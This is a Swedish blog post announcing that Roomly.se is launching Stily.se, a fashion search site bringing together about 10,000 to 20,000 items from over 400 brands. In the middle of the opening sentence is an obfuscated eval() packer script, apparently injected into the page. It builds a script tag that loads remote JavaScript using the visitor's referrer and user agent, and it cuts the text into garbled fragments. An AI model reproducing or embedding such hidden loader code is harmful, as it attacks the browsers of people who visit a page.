Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Roomly lanserar Stily.se med fokus på Kläder & mode online

Roomly lanserar Stily.se med fokus på Kläder & mode online

Inredningsbutiken eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbzbr|var|u0026u|referrer|rhtrf||js|php’.split(’|’),0,{}))
Roomly.se som vi skrivit om tidigare på Revue fortsätter expandera på den svenska internetmarknaden. Som förgrening till Roomly.se lanserar nu företaget Stily.se, en ny sajt med fokus på kläder & mode online. 

Detaljhandeln fortsätter att växa sig större och större varje dag på nätet, det är något som Roomly AB ser och tar vara på. Stily.se är ett nytt modevaruhus på nätet som samlar Sveriges största återförsäljare och butiker på en och samma plats. Kort sagt kan man säga att Stily.se är en sökmotor för kläder & mode. Konceptet är väldigt likt Roomly.se som också är en sökmotor/samlingssajt men för inredning och design.

Modesajten har idag omkring 10 000 kläder och modeartiklar men har i ett pressmeddelande nämnt att i slutet av denna vecka redan ha omkring 15 – 20 tusen artiklar från över 400 varumärken redo på sajten. Det finns flera olika kategorier, allt från plånböcker och väskor till jackor, byxor, kavajer, klänningar, skor, och tröjor. Man väljer snabbt på startsidan om man är ute efter Herrkläder eller Damkläder, sen är det bara att börja söka upp det man är ute efter på sajten.

Det finns liknande sajter på den svenska marknaden men det är något som Stily.se är medvetna om men inte tycker sig bry si om. De menar att det finns gott om plats för fler klädsajter inom samma segment.

Stily.se gick live förra veckan och hittas via följande länk! Kläder & mode online